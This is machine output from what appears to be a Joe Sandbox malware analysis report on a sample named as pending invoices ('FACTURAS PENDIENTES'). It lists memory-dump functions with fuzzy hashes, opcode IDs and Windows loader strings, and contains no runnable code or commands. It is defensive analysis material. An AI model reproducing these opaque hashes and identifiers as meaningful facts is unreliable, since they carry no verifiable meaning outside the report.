                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: RtlValidateHeap
                                  • API String ID: 3446177414-1797218451
                                  • Opcode ID: d9e959b9845f7206f0d8ba2a8a9592b3f21722f063c1209e162a94999ac44dbc
                                  • Instruction ID: 706418e40d30fd71b0b1334bf3793a3a7120e15d4566a64b676abd2505a21d7e
                                  • Opcode Fuzzy Hash: d9e959b9845f7206f0d8ba2a8a9592b3f21722f063c1209e162a94999ac44dbc
                                  • Instruction Fuzzy Hash: AC41477AA02385DFDB03CFA4C5A07ADBBB2BF80354F448658D9519B681CB349A41DB91
                                  Function 3258705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: kLsE
                                  • API String ID: 3446177414-3058123920
                                  • Opcode ID: 4d15652a8d0313a7b9c4fa9e686627d7611fce3e6baa8830c9dd44852fc3cdd9
                                  • Instruction ID: aab49cb62cda811ae559744bf2f5cbdcd83e8dd8c08931d4b0cba066f806b6ae
                                  • Opcode Fuzzy Hash: 4d15652a8d0313a7b9c4fa9e686627d7611fce3e6baa8830c9dd44852fc3cdd9
                                  • Instruction Fuzzy Hash: E5412A79A8336186E711AF64E8857793F90EB40769F500919FC51EA1C1CBF447C3CBA1
                                  Function 324F52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@
                                  • API String ID: 0-149943524
                                  • Opcode ID: aec1c059ae74620476acae5f4b06e54b0ea9bfb4c91a697a1f19881c7fd0ab25
                                  • Instruction ID: 56ed2d1313cd327da35c45f2ae719a2cf6a99148a708f4677b52a7b7fee3a636
                                  • Opcode Fuzzy Hash: aec1c059ae74620476acae5f4b06e54b0ea9bfb4c91a697a1f19881c7fd0ab25
                                  • Instruction Fuzzy Hash: BB32ADB8508351ABE724CF15C480B2EB7F1EFC4B48F50491EF9959B290EB76C985CB92
                                  Function 324E5702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 9eaee5b2dd2ab972593e33e94e07542d1eff0c2ce60368254aa7d6fa5c436113
                                  • Instruction ID: 3a9d8a7d98c0f96d9b11c8e837eddd1317b99ab85caf991e28b7bb192de1aa37
                                  • Opcode Fuzzy Hash: 9eaee5b2dd2ab972593e33e94e07542d1eff0c2ce60368254aa7d6fa5c436113
                                  • Instruction Fuzzy Hash: C731AE35601B06EFE7599F60CA80B89FBA5FF84395F405029E90297A50DBB0E971CBD0
                                  Function 32561ACB Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$AddD
                                  • API String ID: 0-2525844869
                                  • Opcode ID: 41bf7d5a2d69f45a3f3ba45ef7b3a3628e6752cf446762c9b64df21c32afa6f6
                                  • Instruction ID: 6b9670a6a79bad03490d68e041399dcd017117c8bfa127c1261dd6951cd893b9
                                  • Opcode Fuzzy Hash: 41bf7d5a2d69f45a3f3ba45ef7b3a3628e6752cf446762c9b64df21c32afa6f6
                                  • Instruction Fuzzy Hash: 19A15DB5504344AFE314CF54C845BBBBBE9FB84709F509A2EF59486290E7B0EA44CB52
                                  Function 324FF720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $$$
                                  • API String ID: 3446177414-233714265
                                  • Opcode ID: 71ab0551dd3886b3e83d2185a3d291c04623f9097655a9e70bba17a454d7925c
                                  • Instruction ID: 11f451f7961f3511b35c34ee073dc558a5004f4cfaf675bebb75af9413504d00
                                  • Opcode Fuzzy Hash: 71ab0551dd3886b3e83d2185a3d291c04623f9097655a9e70bba17a454d7925c
                                  • Instruction Fuzzy Hash: CB61BD75E00749EBEB20CFA4C580B9DB7B1FF84308F51446DD915AB680DBB6AA81CB90
                                  Function 325735BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                  • API String ID: 0-118005554
                                  • Opcode ID: bc139f2cdb94d9061eee6d8b9f643b44978b432ecdebc6056b58509003baa0d4
                                  • Instruction ID: cd213df727f4d96cb968d445289d66b18b800ed612d15154f3320392756a4568
                                  • Opcode Fuzzy Hash: bc139f2cdb94d9061eee6d8b9f643b44978b432ecdebc6056b58509003baa0d4
                                  • Instruction Fuzzy Hash: 3B31AD76248781AFD301CF68D944B2ABBE4EF95768F40086DF894CB390EB71DA05CB52
                                  Function 3251329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .Local\$@
                                  • API String ID: 0-380025441
                                  • Opcode ID: 72c936d7e1df93496258d12d84fff468dec18ab1edc16e84f6c2ee19aa1627dc
                                  • Instruction ID: f92f940c2c7a06843ac1f73775a0ffa9df1e1725ff6633fda32380765c1ff8af
                                  • Opcode Fuzzy Hash: 72c936d7e1df93496258d12d84fff468dec18ab1edc16e84f6c2ee19aa1627dc
                                  • Instruction Fuzzy Hash: A33184B6518345AFE711CF28C590A5BBBE8EBD4754F40092EF99483250EB31EE44CB96
                                  Function 325134B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlpInitializeAssemblyStorageMap, xrefs: 32552A90
                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 32552A95
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                  • API String ID: 0-2653619699
                                  • Opcode ID: 3d58f89939e3053dc72a548b0771efb1c7dab476e54ca45957019f5b12d0e1db
                                  • Instruction ID: b724ce927c7e5462b2a5526c058857aa40cc47d589bdec591b0dce2b01a87d23
                                  • Opcode Fuzzy Hash: 3d58f89939e3053dc72a548b0771efb1c7dab476e54ca45957019f5b12d0e1db
                                  • Instruction Fuzzy Hash: 2A112CB5B00214BBFB158A5DCD46F5B77AD9B94B58F2480697904DB344EAF4DF00C790
                                  Function 3250B2C0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @[]2@[]2
                                  • API String ID: 0-983809011
                                  • Opcode ID: 64d1fa7207e7b71003c9ff6682c32f9ed0d1430c569380cadceb3ccda2fb29ce
                                  • Instruction ID: 4aa6af5f04395f015935bbbafb13233339d3f274379150ca79b84be2992f7893
                                  • Opcode Fuzzy Hash: 64d1fa7207e7b71003c9ff6682c32f9ed0d1430c569380cadceb3ccda2fb29ce
                                  • Instruction Fuzzy Hash: EF32AFB5E01219DFDB14CF98DC90BAEBBB1FF94758F544029E805AB391EB359A01CB90
                                  Function 325B31E1 Relevance: 1.8, APIs: 1, Instructions: 281COMMON
                                  Download Yara Rule
                                  APIs
                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 325B3356
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: CallFilterFunc@8
                                  • String ID:
                                  • API String ID: 4062629308-0
                                  • Opcode ID: 4d4343bd92cb3dd4ddb6bd4e569d584ee8c299413d9836b6bfbe8ed3a13593ab
                                  • Instruction ID: 9b37485a563c37957ae39e1b2ebd4b3b2fa5cf27dfd8268050c211e74bd19f0a
                                  • Opcode Fuzzy Hash: 4d4343bd92cb3dd4ddb6bd4e569d584ee8c299413d9836b6bfbe8ed3a13593ab
                                  • Instruction Fuzzy Hash: BEC123B9901B599FDB24CF19C884799FBF1FF98314F5081AED549A7250DB74AA81CF00
                                  Function 324E1131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 480a313c979d9b8616e48a4e0867527baf05399696de78dd05b29c9635f13992
                                  • Instruction ID: d12f0d6f457bdedd63a4dd9fafc6c08ebde5a867d17a6cdf061bd7031c7059a8
                                  • Opcode Fuzzy Hash: 480a313c979d9b8616e48a4e0867527baf05399696de78dd05b29c9635f13992
                                  • Instruction Fuzzy Hash: E1B131B56093808FE355CF28C880A1AFBE1BF88704F54496EF999DB352D771E981CB42
                                  Function 324E7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2c1706ea2643076425c3c79f3afd083826aaad0bf0a796cc72631cc5ff938d44
                                  • Instruction ID: 9582bc9cec09ccfa6ef6cd048bec6904240bfa424ec2929414c8533be4a6b461
                                  • Opcode Fuzzy Hash: 2c1706ea2643076425c3c79f3afd083826aaad0bf0a796cc72631cc5ff938d44
                                  • Instruction Fuzzy Hash: 27A16D75A08341DFE314CF28C580A1ABBE5FF88765F10496DF98697350EB70EA85CB92
                                  Function 324E7703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4407303db58b68e8f57a1696915f3491e978ef949b2e922df0bbccd991ce41fc
                                  • Instruction ID: 2ba64ca7e7159bae0c9b76d67f6f38ead1348b75318494379d0c9daf797d19e9
                                  • Opcode Fuzzy Hash: 4407303db58b68e8f57a1696915f3491e978ef949b2e922df0bbccd991ce41fc
                                  • Instruction Fuzzy Hash: F1616375E01606EFEB08CF79C580AADFBB5BF88750F14856ED41AA7340DB70AA45CB90
                                  Function 3251F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 494de545f9b673173152af389a10a88473755f2f7d95b3eb4da95fbb4bd4444e
                                  • Instruction ID: bec0d7a6b6fee29f898cbdb4c1e1c6a1e9dc7a888837f2bf1e7f04d12b63d029
                                  • Opcode Fuzzy Hash: 494de545f9b673173152af389a10a88473755f2f7d95b3eb4da95fbb4bd4444e
                                  • Instruction Fuzzy Hash: 21414BB4D01388EFDB10DFA9C480AADBBF4BB48344F50456EE459E7252DB30AA41CF60
                                  Function 32591AA3 Relevance: 1.6, Strings: 1, Instructions: 370COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .
                                  • API String ID: 0-248832578
                                  • Opcode ID: fa3985c7db64b65dcd3996e6384d022fc9dc6e5e389ca8724620b1359958cb72
                                  • Instruction ID: 83f94f8000217117c5a2a49290c894e945ad40227975559375b60e3b9eced848
                                  • Opcode Fuzzy Hash: fa3985c7db64b65dcd3996e6384d022fc9dc6e5e389ca8724620b1359958cb72
                                  • Instruction Fuzzy Hash: C4E19F79D002698FDB14CFA9C8407EDBBF5FF44B44F90815AE885AB290DB749E82DB50
                                  Function 324DB480 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 64d8af04f588d31e06806c06d842a624e069304a351c7f99b971e897625d1192
                                  • Instruction ID: d39713765edc809e5dd6e6f45a0b130fac2ffdb4f140a6e8d4f7f354c07258b6
                                  • Opcode Fuzzy Hash: 64d8af04f588d31e06806c06d842a624e069304a351c7f99b971e897625d1192
                                  • Instruction Fuzzy Hash: 3431F172501304AFC711DF14C8A0A5A77A5EF857A8F50466DFD449B392DB72ED82CBD0
                                  Function 324E57C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 7d30f022b231732b9eb3eb7b4a00d05b2c2e8d827aa1cf2f24dccb9877aac678
                                  • Instruction ID: b9eae3bc1c21cb9787763ce46fb2c5647920225a5b0ceb9869bd9a4cff855932
                                  • Opcode Fuzzy Hash: 7d30f022b231732b9eb3eb7b4a00d05b2c2e8d827aa1cf2f24dccb9877aac678
                                  • Instruction Fuzzy Hash: 6D318D36615A46FFEB499F24CA40A89FBA6FF84350F505029EC5287B50DB71E931CB80
                                  Function 324E3616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: e90de5db20935c2e7e759e66e623cd7a5660b044113e51944002c05c6e74de5a
                                  • Instruction ID: f8971f4eb7216a389c438e09d3a4037a60bb19e1638cd00adbaebde51797e4d8
                                  • Opcode Fuzzy Hash: e90de5db20935c2e7e759e66e623cd7a5660b044113e51944002c05c6e74de5a
                                  • Instruction Fuzzy Hash: A82122B5206650AFF722DF28C944B2ABFA0FF80B55F41646CE8424B740EAB1E945CF81
                                  Function 324D92FF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 6ed17764eeb2053d90010854b8ceb10d4543f6caacfabc1232dccd439cc58b3a
                                  • Instruction ID: c1d6064a2c1ad2bee4d227bef3d4b607a7534f2b79fa934a4db8c3d3be8b3410
                                  • Opcode Fuzzy Hash: 6ed17764eeb2053d90010854b8ceb10d4543f6caacfabc1232dccd439cc58b3a
                                  • Instruction Fuzzy Hash: 9CF09A32200684ABD7319B59CD08F9ABBEDEF88B50F19051DA94693191DAE1E949C660
                                  Function 324E973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                  • Instruction ID: 43fadf38f634b9c6659b7dd42cf85ac4a8cfe7a79d8cca45705aed6be1913b6a
                                  • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                  • Instruction Fuzzy Hash: EF6198B5D00359AFEF11CFA5C840BDEBBB4FF84715F10416AE861A72A0DB708A41CBA0
                                  Function 3256F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                  • Instruction ID: 5ee9acf5bfffd6515cd2e54c713968502c25fb36dacd8d4a8ed97ad600b22d30
                                  • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                  • Instruction Fuzzy Hash: 35519EB2904345BFE7118F64C840F6BBBE8FB84758F401929B991D7290DBB5EE04CB92
                                  Function 324DB136 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
